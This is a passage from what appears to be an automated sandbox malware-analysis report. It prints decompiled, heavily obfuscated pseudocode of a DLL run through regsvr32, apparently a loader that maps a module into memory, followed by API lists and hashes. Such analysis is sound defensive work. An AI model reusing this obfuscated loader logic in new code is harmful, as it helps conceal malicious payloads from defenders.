										_t1165 =  *0x1004b0e8; // 0x0
										_t1051 =  *0x1004b0dc; // 0x0
										_t583 =  *0x1004b0e0; // 0x0
										 *(_t1248 + 0x34) = E10002BF0((2 - _t351 * _t351) * _t583 - _t692 + _t692 - _t1165 + _t1051 +  *((intOrPtr*)(_t1248 + 0x38)), (1 - _t1165) * _t351 * _t1051 +  *((intOrPtr*)(_t951 + 0x50)));
										_t354 =  *0x1004b0d8; // 0x0
										_t142 = _t354 + 0x7ffffffe; // 0x7ffffffe
										_t143 = _t354 + 2; // 0x2
										_t356 =  *0x1004b0e4; // 0x0
										_t360 =  *0x1004b0ec; // 0x0
										_t146 = _t1051 + 0xa; // 0xa
										_t706 =  *0x1004b0d8; // 0x0
										 *(_t1248 + 0x1c) =  *(_t1248 + 0x34) + (_t356 * 0x7fffffff + _t142 * _t1165 + _t1051 + _t1051 + _t143 * _t583 << 1) - (_t1051 + _t146) * _t360;
										_t707 = _t706 * _t1051;
										 *(_t1248 + 0x14) = _t707;
										_t1166 =  *0x1004b0ec; // 0x0
										 *(_t1248 + 0x34) = (_t707 * 0xfffffffd - (_t1165 * _t1165 + 3 + _t1165 * _t1165 * 2) * _t583 + 3) * _t583;
										_t1167 =  *0x1004b0d8; // 0x0
										_t373 = E10002BF0( *((intOrPtr*)(_t1248 + 0x3c)) + _t360, ( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167 + (( *(_t1248 + 0x14) + 1) * _t1051 - _t1165 + _t1166 + _t1166 + _t1167) * 2 +  *(_t1248 + 0x34) +  *(_t1248 + 0x18));
										_t1249 = _t1248 + 8;
										if( *(_t1248 + 0x20) != _t373) {
											goto L32;
										} else {
											_t716 =  *0x1004b0ec; // 0x0
											 *(_t1249 + 0x20) = _t716 * _t1167;
											_t165 = _t1051 + 2; // 0x3
											_t717 =  *0x1004b0e8; // 0x0
											_t166 = _t1167 + 1; // 0x1
											_t385 =  *0x1004b0e4; // 0x0
											_t388 =  *0x1004b0ec; // 0x0
											_t398 =  *0x1004b0e4; // 0x0
											_t403 =  *0x1004b0ec; // 0x0
											_t722 =  *0x1004b0e8; // 0x0
											_t182 = _t403 + 1; // 0x1
											_t1168 =  *((intOrPtr*)(_t1249 + 0x74));
											_t405 =  *_t1168((( ~_t1051 << 1) - ( *((intOrPtr*)(_t1249 + 0x30)) + 2) *  *0x1004b0e4 + _t583 << 2) - (_t403 + _t403 + _t403 * 2 + _t182 * _t722 * _t722 * 4) * _t1167 +  *((intOrPtr*)(_t951 + 0x34)),  *(_t1249 + 0x20), ((_t388 * _t388 * _t1167 + _t388 * _t388 * _t1167 * 0x00000002 - _t1051 + _t1051 * 0x00000002) * _t583 - _t1051 + _t1051 * 0x00000002) * _t1051 + (_t583 * _t1167 + _t583 * _t1167 * 0x00000002 - 0x00000003) * _t717 -  *(_t1249 + 0x28) +  *(_t1249 + 0x28) * 0x00000002 + 0x00001000 | (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + (_t398 + 0x7fffffff) * _t1051 + _t583 * 0x7fffffff + 0x00002000, ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + ((1 - _t583) * _t1167 + _t165) * _t716 + (_t583 *  *0x1004b0e4 + 3) * _t717 + _t166 * _t583 + _t385 * _t1167 * 0x7fffffff + 4,  *((intOrPtr*)(_t1249 + 0x78)));
											_t1250 = _t1249 + 0x14;
											_t585 = _t405;
											 *((intOrPtr*)(_t1250 + 0x10)) = _t585;
											if(_t585 != 0) {
												L21:
												_t836 =  *0x1004b0e8; // 0x0
												_t726 =  *0x1004b0ec; // 0x0
												_t213 = (_t836 -  *0x1004b0dc + 1) * _t836 + _t726 + 0x40; // 0x41
												_t840 =  *0x1004b0d8; // 0x0
												_t1064 =  *0x1004b0e4; // 0x0
												_t841 =  *0x1004b0e8; // 0x0
												_t410 = HeapAlloc(GetProcessHeap(), 8 + ((_t841 + 1) *  *0x1004b0dc + (_t726 * 0x3fffffff + _t840) *  *0x1004b0e0 + _t726 * 0x3fffffff + _t1064) * 4, (1 - _t726) *  *0x1004b0e0 + _t213);
												_t731 =  *0x1004b0e8; // 0x0
												_t411 =  *0x1004b0e0; // 0x0
												_t412 =  *0x1004b0ec; // 0x0
												_t1066 = _t410 + (_t731 - _t411 - _t412 +  *0x1004b0dc << 6);
												if(_t1066 != 0) {
													 *((intOrPtr*)(_t1066 + 4)) = _t585;
													_t413 =  *0x1004b0e0; // 0x0
													_t732 =  *0x1004b0ec; // 0x0
													_t224 = _t732 * 2; // -268738780
													_t853 =  *0x1004b0e8; // 0x0
													_t733 =  *0x1004b0d8; // 0x0
													 *((intOrPtr*)(_t1066 + 0x20)) =  *((intOrPtr*)(_t1250 + 0x68));
													asm("sbb eax, eax");
													 *((intOrPtr*)(_t1066 + 0x2c)) =  *((intOrPtr*)(_t1250 + 0x74));
													 *(_t1066 + 0x14) =  ~( ~((_t413 + _t732) * _t413 + _t224 + 0x00001000 - _t853 + _t733 << 0x00000001 &  *(_t951 + 0x16) & 0x0000ffff));
													 *((intOrPtr*)(_t1066 + 0x24)) =  *((intOrPtr*)(_t1250 + 0x6c));
													 *((intOrPtr*)(_t1066 + 0x34)) =  *((intOrPtr*)(_t1250 + 0x78));
													 *((intOrPtr*)(_t1066 + 0x28)) =  *((intOrPtr*)(_t1250 + 0x70));
													 *((intOrPtr*)(_t1066 + 0x1c)) = _t1168;
													_t423 =  *0x1004b0e8; // 0x0
													_t736 =  *0x1004b0e4; // 0x0
													 *((intOrPtr*)(_t1066 + 0x3c)) = ((3 - _t423 + _t423 * 2) *  *0x1004b0ec - 6) *  *0x1004b0e0 + _t736 + _t736 * 2 - _t423 + _t423 * 2 +  *((intOrPtr*)(_t1250 + 0x38));
													_t1169 =  *0x1004b0ec; // 0x0
													_t425 =  *0x1004b0e4; // 0x0
													_t738 =  *0x1004b0e0; // 0x0
													_t587 =  *0x1004b0d8; // 0x0
													_t739 =  *0x1004b0e8; // 0x0
													 *((intOrPtr*)(_t1250 + 0x2c)) =  *((intOrPtr*)(_t951 + 0x54));
													_t867 =  *0x1004b0e0; // 0x0
													_t433 = E10002C60((_t739 + _t739 * 2 - 3) * _t1169 +  *((intOrPtr*)(_t1250 + 0x64)) + _t587 * _t587 - _t867 + (_t587 * _t587 - _t867) * 2,  *((intOrPtr*)(_t951 + 0x54)) + (_t425 * _t1169 + _t738 + _t739 + _t587) * 2 + _t425 * _t1169 + _t738 + _t739 + _t587);
													_t1251 = _t1250 + 8;
													if(_t433 == 0) {
														L31:
														_push(_t1066);
														E10004DD0();
														goto L32;
													} else {
														_t743 =  *0x1004b0e0; // 0x0
														_t436 =  *0x1004b0e8; // 0x0
														_t437 =  *0x1004b0dc; // 0x0
														_t752 =  *0x1004b0e0; // 0x0
														_t1170 =  *0x1004b0e4; // 0x0
														_t438 =  *0x1004b0e8; // 0x0
														_t441 =  *((intOrPtr*)(_t1251 + 0x78))( *((intOrPtr*)(_t1251 + 0x1c)),  *(_t1251 + 0x34) + (_t587 * 0x7fffffff + _t752) * 2, 0x1000 + ((_t1170 + _t437) * 0x3fffffff + (_t1169 * 0x3fffffff + _t437 + 2) * _t1169 + _t438) * 4, 4 + (((_t436 + _t1169 + _t437) * 0x3fffffff + _t587 + 2) * _t437 + _t1169 + (3 - _t743 *  *0x1004b0e4) * _t436 + _t752 * 2) * 4,  *((intOrPtr*)(_t1251 + 0x78)));
														_t754 =  *0x1004b0dc; // 0x0
														_t590 =  *0x1004b0d8; // 0x0
														_t1174 =  *0x1004b0d8; // 0x0
														 *(_t1251 + 0x34) = _t441;
														_t442 =  *0x1004b0e8; // 0x0
														_t888 =  *0x1004b0e4; // 0x0
														_t444 =  *0x1004b0ec; // 0x0
														memcpy( *(_t1251 + 0x34),  *(_t1251 + 0x70), ((2 - _t442) *  *0x1004b0e4 + _t1174 + 2) *  *0x1004b0e0 - (_t754 * _t754 + _t442 + _t590) *  *0x1004b0ec - _t888 * _t442 - _t442 * _t754 - _t444 - _t444 - _t754 - _t754 +  *((intOrPtr*)(_t951 + 0x54)));
														_t604 =  *0x1004b0d8; // 0x0
														_t756 =  *0x1004b0dc; // 0x0
														_t448 =  *0x1004b0e0; // 0x0
														_t890 =  *0x1004b0ec; // 0x0
														_t891 =  *0x1004b0d8; // 0x0
														_t279 = _t448 + 0x2e9; // 0x2e9
														_t453 =  *((intOrPtr*)(_t1251 + 0x40)) +  *((intOrPtr*)( *((intOrPtr*)(_t1251 + 0x7c)) + 0x3c)) + (((_t448 + _t890) * _t890 + (_t604 - _t756 + 1) *  *0x1004b0e4 + _t448 + _t891) * 0xf8 + (_t448 * _t891 - 0xfa) *  *0x1004b0e8 - _t279 *  *0x1004b0e4 + (_t448 + 0xfffffffe) *  *0x1004b0ec + _t756 * 0x2e5) * 2;
														 *_t1066 = _t453;
														_t759 =  *0x1004b0e4; // 0x0
														_t1184 =  *0x1004b0e0; // 0x0
														_t895 =  *0x1004b0e8; // 0x0
														_t1187 =  *0x1004b0ec; // 0x0
														 *((intOrPtr*)(_t453 + 0x34)) = (2 - _t759 + _t759) *  *0x1004b0e0 +  *((intOrPtr*)(_t1251 + 0x30)) + (_t759 * 0x7ffffffd + ((_t759 *  *0x1004b0ec + _t895 + 1) * 0x7fffffff + _t1184 *  *0x1004b0d8 *  *0x1004b0dc) * _t895 + _t1187) * 2;
														_t900 =  *0x1004b0e8; // 0x0
														_t454 =  *0x1004b0e4; // 0x0
														_t761 =  *0x1004b0ec; // 0x0
														_t624 =  *0x1004b0d8; // 0x0
														_t293 = _t624 + 1; // 0x1
														_t463 =  *0x1004b0e0; // 0x0
														_push((0xc0 - (_t454 * _t900 * _t761 + _t454 * _t900 * _t761 * 2 << 6)) * _t900 - (_t293 * _t761 + _t293 * _t761 * 2 << 6) + _t1066);
														_push(_t951);
														_push((0xfffffffc -  *0x1004b0e4) *  *0x1004b0dc - (_t463 + 1) * _t900 * _t761 - _t761 * _t624 - _t900 +  *((intOrPtr*)(_t1251 + 0x88)));
														_push( *((intOrPtr*)(_t1251 + 0x84)));
														_t467 = E10002CA0();
														_t1251 = _t1251 + 0x30;
														if(_t467 == 0) {
															goto L31;
														} else {
															_t468 =  *0x1004b0e8; // 0x0
															_t765 =  *0x1004b0d8; // 0x0
															_t1200 =  *0x1004b0dc; // 0x0
															_t903 =  *0x1004b0e4; // 0x0
															_t905 =  *0x1004b0ec; // 0x0
															_t1202 = _t765 - _t905 + _t905;
															_t907 =  *0x1004b0dc; // 0x0
															_t299 = _t1202 - 2; // -2
															_t636 = (_t765 + _t299) * _t907 + (((_t468 * _t765 - _t1200) * _t765 - 2) *  *0x1004b0e0 + _t468 * _t468 - _t903 + _t903 - _t905) * 2 +  *((intOrPtr*)( *_t1066 + 0x34)) -  *((intOrPtr*)(_t951 + 0x34));
															 *((intOrPtr*)(_t1251 + 0x60)) = _t636;
															if(_t636 == 0) {
																 *((intOrPtr*)(_t1066 + 0x18)) = 1;
															} else {
																_t963 =  *0x1004b0e0; // 0x0
																_t1227 =  *0x1004b0e4; // 0x0
																_push( *((intOrPtr*)(_t1251 + 0x60)) + ((_t963 - _t1227 +  *0x1004b0ec << 1) - (_t468 *  *0x1004b0ec * _t907 * _t907 * _t907 + _t963 * _t468) * _t468 + _t907) * 4);
																_t970 =  *0x1004b0e0; // 0x0
																_t971 =  *0x1004b0e4; // 0x0
																_push((((_t970 * _t970 << 1) - _t971 + _t468 + _t468 - 2) * _t907 - (_t907 + 4 + _t765 * 2) * _t971 + (_t765 - _t468 + _t468) * 2 << 6) + _t1066);
																_t492 = E10003B80();
																_t924 =  *0x1004b0e0; // 0x0
																_t1251 = _t1251 + 8;
																 *((intOrPtr*)(_t1066 + 0x18)) = _t492 - (_t924 *  *0x1004b0d8 << 2);
															}
															_t469 =  *0x1004b0e4; // 0x0
															_t766 =  *0x1004b0e0; // 0x0
															_push((_t766 - _t469 *  *0x1004b0e8 *  *0x1004b0ec *  *0x1004b0dc << 8) + _t1066);
															_t473 = E10003F40();
															_t1251 = _t1251 + 4;
															if(_t473 == 0) {
																goto L31;
															} else {
																_t474 =  *0x1004b0e8; // 0x0
																_t770 =  *0x1004b0dc; // 0x0
																_t637 =  *0x1004b0e4; // 0x0
																_t318 = _t474 * 2; // 0x1
																_t954 =  *0x1004b0ec; // 0x0
																_push(((1 - _t474 - _t770) *  *0x1004b0d8 + (_t770 + _t318 + 1) *  *0x1004b0e0 + _t770 * 2 - _t637 - _t954 + _t474 << 8) + _t1066);
																_t475 = E10003570();
																_t1251 = _t1251 + 4;
																if(_t475 == 0) {
																	goto L31;
																} else {
																	_t913 =  *0x1004b0e0; // 0x0
																	_push((_t913 *  *0x1004b0d8 *  *0x1004b0dc << 7) + _t1066);
																	_t476 = E10003AD0();
																	_t1251 = _t1251 + 4;
																	if(_t476 != 0) {
																		_t478 =  *((intOrPtr*)( *_t1066 + 0x28));
																		 *((intOrPtr*)(_t1251 + 0x60)) = _t478;
																		if(_t478 == 0) {
																			 *(_t1066 + 0x38) = 0;
																			return _t1066;
																		} else {
																			if( *(_t1066 + 0x14) == 0) {
																				_t481 =  *0x1004b0d8; // 0x0
																				_t955 =  *0x1004b0e0; // 0x0
																				_t918 =  *0x1004b0ec; // 0x0
																				_t778 =  *0x1004b0e8; // 0x0
																				_t331 = _t955 * _t778 - _t918 + 1; // 0x1
																				 *(_t1066 + 0x38) = (_t778 * _t778 * _t481 * 4 - 4) * _t955 + (4 - _t481 * 4) * _t918 +  *((intOrPtr*)(_t1251 + 0x60)) + (_t481 + _t331) *  *0x1004b0dc * 4 +  *((intOrPtr*)(_t1251 + 0x10));
																				return _t1066;
																			} else {
																				_t780 =  *0x1004b0ec; // 0x0
																				_t921 =  *0x1004b0d8; // 0x0
																				_t956 =  *0x1004b0e4; // 0x0
																				_t642 =  *0x1004b0dc; // 0x0
																				_t962 =  *0x1004b0e0; // 0x0
																				 *0x1004d404 = (_t780 * _t921 - (_t956 + _t642) * _t956 - 3) *  *0x1004b0e8 - _t921 * _t642 + _t962 * _t962 - _t780 - _t780 +  *((intOrPtr*)(_t1251 + 0x60)) + _t780 * _t921 + _t921 +  *((intOrPtr*)(_t1251 + 0x10));
																				 *((intOrPtr*)(_t1066 + 0x10)) = 1;
																				return _t1066;
																			}
																		}
																	} else {
																		goto L31;
																	}
																}
															}
														}
													}
												} else {
													_t1067 =  *0x1004b0d8; // 0x0
													_t928 =  *0x1004b0dc; // 0x0
													_t219 = ((_t1067 * _t928 - 1) * _t731 - 1) *  *0x1004b0e4 + _t412 + 0x8000; // 0x7fff
													 *((intOrPtr*)(_t1250 + 0x78))(_t585, 0, (_t412 * _t928 - 1) *  *0x1004b0e0 + _t219,  *((intOrPtr*)(_t1250 + 0x78)));
													return 0;
												}
											} else {
												_t789 =  *0x1004b0e4; // 0x0
												_t930 =  *0x1004b0dc; // 0x0
												_t1075 =  *0x1004b0d8; // 0x0
												_t1076 =  *0x1004b0ec; // 0x0
												_t194 = _t1076 - 4; // -4
												_t665 =  *0x1004b0e8; // 0x0
												_t498 =  *0x1004b0e0; // 0x0
												_t1084 =  *0x1004b0d8; // 0x0
												_t198 = (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084) * 2; // -3
												_t200 = _t1084 + 2; // 0x2
												_t1085 =  *0x1004b0ec; // 0x0
												_t668 =  *0x1004b0d8; // 0x0
												_t207 = (1 - _t668) * _t789 + _t1085 + _t930 + 0x1000; // 0x1001
												_t520 =  *0x1004b0e0; // 0x0
												_t1168 =  *((intOrPtr*)(_t1250 + 0x70));
												_t523 =  *_t1168(0,  *((intOrPtr*)(_t1250 + 0x20)) + _t520 *  *0x1004b0e8 * 2, (_t789 * _t789 * _t930 - _t665 * _t930 - _t1084 + _t198 - 0x00000003) * _t789 - _t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002 + (_t1084 * _t930 + _t200 *  *0x1004b0e0 + _t665 + _t1085 * 0x00000002) * 0x00000002 + 0x00002000 | (0x00000001 - _t668) * _t789 + _t1085 + _t930 + _t207, (1 - _t930) * _t665 + (1 - _t789 * _t930) * _t789 + _t498 + (_t1075 * _t1075 - _t789 * _t930 + _t194) * _t1076 + 4,  *((intOrPtr*)(_t1250 + 0x78)));
												_t1250 = _t1250 + 0x14;
												 *((intOrPtr*)(_t1250 + 0x10)) = _t523;
												if(_t523 == 0) {
													goto L32;
												} else {
													_t585 = _t523;
													goto L21;
												}
											}
										}
									}
								}
							}
						}
					}
				}
			}







































































































































































                                                                        0x10005263
                                                                        0x10005269
                                                                        0x10005271
                                                                        0x10005278
                                                                        0x10005291
                                                                        0x1000529e
                                                                        0x100052a9
                                                                        0x100052b4
                                                                        0x100052bf
                                                                        0x100052d2
                                                                        0x100052da
                                                                        0x10005304
                                                                        0x1000530c
                                                                        0x10006014
                                                                        0x1000601a
                                                                        0x10005312
                                                                        0x10005312
                                                                        0x10005318
                                                                        0x1000531b
                                                                        0x10005321
                                                                        0x10005324
                                                                        0x1000533f
                                                                        0x10005350
                                                                        0x10005361
                                                                        0x00000000
                                                                        0x10005367
                                                                        0x1000536c
                                                                        0x1000536f
                                                                        0x10005377
                                                                        0x1000537d
                                                                        0x10005392
                                                                        0x100053db
                                                                        0x100053f4
                                                                        0x10005409
                                                                        0x00000000
                                                                        0x1000540f
                                                                        0x1000540f
                                                                        0x10005434
                                                                        0x10005436
                                                                        0x10005444
                                                                        0x10005466
                                                                        0x1000546d
                                                                        0x10005477
                                                                        0x10005484
                                                                        0x10005488
                                                                        0x00000000
                                                                        0x1000548e
                                                                        0x1000548e
                                                                        0x100054b4
                                                                        0x100054cb
                                                                        0x00000000
                                                                        0x100054d1
                                                                        0x100054d4
                                                                        0x100054d8
                                                                        0x100054ec
                                                                        0x10005505
                                                                        0x00000000
                                                                        0x1000550b
                                                                        0x1000550b
                                                                        0x1000551b
                                                                        0x10005537
                                                                        0x10005542
                                                                        0x1000555f
                                                                        0x10005575
                                                                        0x10005579
                                                                        0x1000557d
                                                                        0x10005592
                                                                        0x10005594
                                                                        0x100056bc
                                                                        0x100056c2
                                                                        0x1000559a
                                                                        0x100055a5
                                                                        0x100055b0
                                                                        0x100055b4
                                                                        0x100055ba
                                                                        0x100055be
                                                                        0x100055c4
                                                                        0x100055c8
                                                                        0x100055cd
                                                                        0x100055d1
                                                                        0x1000563e
                                                                        0x10005642
                                                                        0x100055d3
                                                                        0x100055e1
                                                                        0x100055ec
                                                                        0x10005600
                                                                        0x10005600
                                                                        0x10005650
                                                                        0x10005654
                                                                        0x10005699
                                                                        0x10005656
                                                                        0x10005656
                                                                        0x10005686
                                                                        0x10005693
                                                                        0x10005693
                                                                        0x100056a3
                                                                        0x100056ac
                                                                        0x100056b0
                                                                        0x100056b0
                                                                        0x100056b0
                                                                        0x100056ba
                                                                        0x100056cf
                                                                        0x100056fb
                                                                        0x10005701
                                                                        0x10005706
                                                                        0x1000570c
                                                                        0x10005712
                                                                        0x10005724
                                                                        0x10005753
                                                                        0x10005757
                                                                        0x1000575c
                                                                        0x10005765
                                                                        0x10005770
                                                                        0x10005783
                                                                        0x10005788
                                                                        0x10005797
                                                                        0x1000579d
                                                                        0x100057a1
                                                                        0x100057b3
                                                                        0x100057cf
                                                                        0x100057d5
                                                                        0x100057dd
                                                                        0x100057f5
                                                                        0x100057fe
                                                                        0x10005803
                                                                        0x00000000
                                                                        0x10005809
                                                                        0x10005809
                                                                        0x10005814
                                                                        0x10005827
                                                                        0x1000582e
                                                                        0x10005845
                                                                        0x1000584d
                                                                        0x1000585d
                                                                        0x10005894
                                                                        0x100058c0
                                                                        0x100058c7
                                                                        0x100058cd
                                                                        0x100058e6
                                                                        0x10005907
                                                                        0x10005909
                                                                        0x1000590c
                                                                        0x10005910
                                                                        0x10005914
                                                                        0x10005a04
                                                                        0x10005a04
                                                                        0x10005a0a
                                                                        0x10005a34
                                                                        0x10005a38
                                                                        0x10005a3e
                                                                        0x10005a4f
                                                                        0x10005a72
                                                                        0x10005a78
                                                                        0x10005a80
                                                                        0x10005a89
                                                                        0x10005a99
                                                                        0x10005a9b
                                                                        0x10005ae8
                                                                        0x10005aeb
                                                                        0x10005af0
                                                                        0x10005afc
                                                                        0x10005b03
                                                                        0x10005b09
                                                                        0x10005b23
                                                                        0x10005b2c
                                                                        0x10005b2e
                                                                        0x10005b33
                                                                        0x10005b3a
                                                                        0x10005b41
                                                                        0x10005b44
                                                                        0x10005b47
                                                                        0x10005b4a
                                                                        0x10005b52
                                                                        0x10005b7d
                                                                        0x10005b80
                                                                        0x10005b86
                                                                        0x10005b8b
                                                                        0x10005b94
                                                                        0x10005b9f
                                                                        0x10005ba7
                                                                        0x10005bb8
                                                                        0x10005bd3
                                                                        0x10005bd8
                                                                        0x10005bdd
                                                                        0x10006008
                                                                        0x10006008
                                                                        0x10006009
                                                                        0x00000000
                                                                        0x10005be3
                                                                        0x10005be3
                                                                        0x10005bf5
                                                                        0x10005c07
                                                                        0x10005c27
                                                                        0x10005c47
                                                                        0x10005c4f
                                                                        0x10005c75
                                                                        0x10005c79
                                                                        0x10005c7f
                                                                        0x10005c85
                                                                        0x10005c90
                                                                        0x10005c94
                                                                        0x10005cbf
                                                                        0x10005ccf
                                                                        0x10005cec
                                                                        0x10005cf2
                                                                        0x10005cf8
                                                                        0x10005d08
                                                                        0x10005d13
                                                                        0x10005d23
                                                                        0x10005d36
                                                                        0x10005d70
                                                                        0x10005d72
                                                                        0x10005d74
                                                                        0x10005d7a
                                                                        0x10005d8e
                                                                        0x10005da9
                                                                        0x10005dd5
                                                                        0x10005dd8
                                                                        0x10005dde
                                                                        0x10005de3
                                                                        0x10005dec
                                                                        0x10005e05
                                                                        0x10005e13
                                                                        0x10005e1e
                                                                        0x10005e30
                                                                        0x10005e4e
                                                                        0x10005e4f
                                                                        0x10005e50
                                                                        0x10005e55
                                                                        0x10005e5a
                                                                        0x00000000
                                                                        0x10005e60
                                                                        0x10005e60
                                                                        0x10005e65
                                                                        0x10005e6b
                                                                        0x10005e8c
                                                                        0x10005e96
                                                                        0x10005ea2
                                                                        0x10005ea4
                                                                        0x10005eaa
                                                                        0x10005eba
                                                                        0x10005ebd
                                                                        0x10005ec1
                                                                        0x10005f58
                                                                        0x10005ec7
                                                                        0x10005ec7
                                                                        0x10005ee6
                                                                        0x10005f04
                                                                        0x10005f05
                                                                        0x10005f10
                                                                        0x10005f38
                                                                        0x10005f39
                                                                        0x10005f3e
                                                                        0x10005f4e
                                                                        0x10005f53
                                                                        0x10005f53
                                                                        0x10005f5f
                                                                        0x10005f79
                                                                        0x10005f86
                                                                        0x10005f87
                                                                        0x10005f8c
                                                                        0x10005f91
                                                                        0x00000000
                                                                        0x10005f93
                                                                        0x10005f93
                                                                        0x10005f98
                                                                        0x10005f9e
                                                                        0x10005fa4
                                                                        0x10005fc1
                                                                        0x10005fd5
                                                                        0x10005fd6
                                                                        0x10005fdb
                                                                        0x10005fe0
                                                                        0x00000000
                                                                        0x10005fe2
                                                                        0x10005fe2
                                                                        0x10005ffb
                                                                        0x10005ffc
                                                                        0x10006001
                                                                        0x10006006
                                                                        0x1000601d
                                                                        0x10006022
                                                                        0x10006026
                                                                        0x1000610e
                                                                        0x1000611d
                                                                        0x1000602c
                                                                        0x10006031
                                                                        0x100060a5
                                                                        0x100060aa
                                                                        0x100060b0
                                                                        0x100060c4
                                                                        0x100060d4
                                                                        0x10006101
                                                                        0x1000610c
                                                                        0x10006033
                                                                        0x10006033
                                                                        0x10006039
                                                                        0x1000603f
                                                                        0x10006045
                                                                        0x1000606d
                                                                        0x1000608f
                                                                        0x10006095
                                                                        0x100060a4
                                                                        0x100060a4
                                                                        0x10006031
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10006006
                                                                        0x10005fe0
                                                                        0x10005f91
                                                                        0x10005e5a
                                                                        0x10005a9d
                                                                        0x10005aa1
                                                                        0x10005aa8
                                                                        0x10005acc
                                                                        0x10005ad7
                                                                        0x10005ae7
                                                                        0x10005ae7
                                                                        0x1000591a
                                                                        0x1000591a
                                                                        0x10005920
                                                                        0x1000592b
                                                                        0x10005936
                                                                        0x10005943
                                                                        0x10005947
                                                                        0x10005957
                                                                        0x10005981
                                                                        0x10005989
                                                                        0x1000598d
                                                                        0x100059a0
                                                                        0x100059ae
                                                                        0x100059cb
                                                                        0x100059d2
                                                                        0x100059e7
                                                                        0x100059f1
                                                                        0x100059f3
                                                                        0x100059f8
                                                                        0x100059fc
                                                                        0x00000000
                                                                        0x10005a02
                                                                        0x10005a02
                                                                        0x00000000
                                                                        0x10005a02
                                                                        0x100059fc
                                                                        0x10005914
                                                                        0x10005803
                                                                        0x10005505
                                                                        0x100054cb
                                                                        0x10005488
                                                                        0x10005409
                                                                        0x10005361

                                                                        APIs
                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 100056FB
                                                                        • GetProcessHeap.KERNEL32(00000000,00000041), ref: 10005A6B
                                                                        • HeapAlloc.KERNEL32(00000000), ref: 10005A72
                                                                        • memcpy.MSVCRT ref: 10005CEC
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$AllocInfoNativeProcessSystemmemcpy
                                                                        • String ID:
                                                                        • API String ID: 1755227880-0
                                                                        • Opcode ID: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                        • Instruction ID: 53ea61cdfd61ec98e79d57da9c3d37a8995a084b4a0616e836109eb4d92bec45
                                                                        • Opcode Fuzzy Hash: 29e49655986be58be8d045e60b3a3291249c8e27a88175d72084e53dc06e759f
                                                                        • Instruction Fuzzy Hash: 5A92D7326407298FD318DF6CCEC2546B7A9F789311B05863AD925DB3B5E670F909CB88
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10037446 Relevance: 15.1, APIs: 10, Instructions: 99memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 83%
                                                                        			E10037446(signed char* __ecx) {
				struct _CRITICAL_SECTION* _v8;
				void* _v12;
				char _v32;
				char _v40;
				char _v48;
				signed int __edi;
				void* __esi;
				struct _CRITICAL_SECTION* _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t45;
				void* _t49;
				void* _t50;
				signed int _t71;
				signed char* _t73;
				signed int _t82;
				signed char* _t85;
				void* _t87;
				void* _t89;
				void* _t91;
				void* _t92;
				void* _t94;

				_t73 = __ecx;
				_t89 = _t94;
				_push(__ecx);
				_push(__ecx);
				_t85 = __ecx;
				_t1 = _t85 + 0x1c; // 0x1004f010
				_t42 = _t1;
				_v8 = _t42;
				EnterCriticalSection(_t42);
				_t3 = _t85 + 4; // 0x20
				_t43 =  *_t3;
				_t4 = _t85 + 8; // 0x3
				if( *_t4 >= _t43) {
					L6:
					_t82 = 1;
					if(_t43 <= 1) {
						L11:
						_t20 = _t43 + 0x20; // 0x40
						_t71 = _t20;
						_t21 = _t85 + 0x10; // 0x2f46400
						_t44 =  *_t21;
						if(_t44 != 0) {
							_t45 = GlobalHandle(_t44);
							_v12 = _t45;
							GlobalUnlock(_t45);
							_t49 = GlobalReAlloc(_v12, _t71 << 3, 0x2002);
						} else {
							_t49 = GlobalAlloc(2, _t71 << 3); // executed
						}
						if(_t49 != 0) {
							_t50 = GlobalLock(_t49);
							_t26 = _t85 + 4; // 0x20
							_v12 = _t50;
							E10011C50(_t50 +  *_t26 * 8, 0, _t71 -  *_t26 << 3);
							 *(_t85 + 4) = _t71;
							 *(_t85 + 0x10) = _v12;
							goto L19;
						} else {
							_t24 = _t85 + 0x10; // 0x2f46400
							_t87 =  *_t24;
							if(_t87 != 0) {
								GlobalLock(GlobalHandle(_t87));
							}
							LeaveCriticalSection(_v8);
							_push(_t89);
							_t91 = _t94;
							_push(_t73);
							_v32 = 0x1004d418;
							E10011C0F( &_v32, 0x10045dc0);
							asm("int3");
							_push(_t91);
							_t92 = _t94;
							_push(_t73);
							_v40 = 0x1004d4b0;
							E10011C0F( &_v40, 0x10045e04);
							asm("int3");
							_push(_t92);
							_push(_t73);
							_v48 = 0x1004d548;
							E10011C0F( &_v48, 0x10045e48);
							asm("int3");
							return _t73[0x70];
						}
					} else {
						_t17 = _t85 + 0x10; // 0x2f46400
						_t73 =  *_t17 + 8;
						while(( *_t73 & 0x00000001) != 0) {
							_t82 = _t82 + 1;
							_t73 =  &(_t73[8]);
							if(_t82 < _t43) {
								continue;
							}
							break;
						}
						if(_t82 < _t43) {
							goto L19;
						} else {
							goto L11;
						}
					}
				} else {
					_t12 = __esi + 0x10; // 0x2f46400
					__ecx =  *_t12;
					if(( *( *_t12 + __edi * 8) & 0x00000001) == 0) {
						L19:
						_t33 = _t85 + 0xc; // 0x3
						if(_t82 >=  *_t33) {
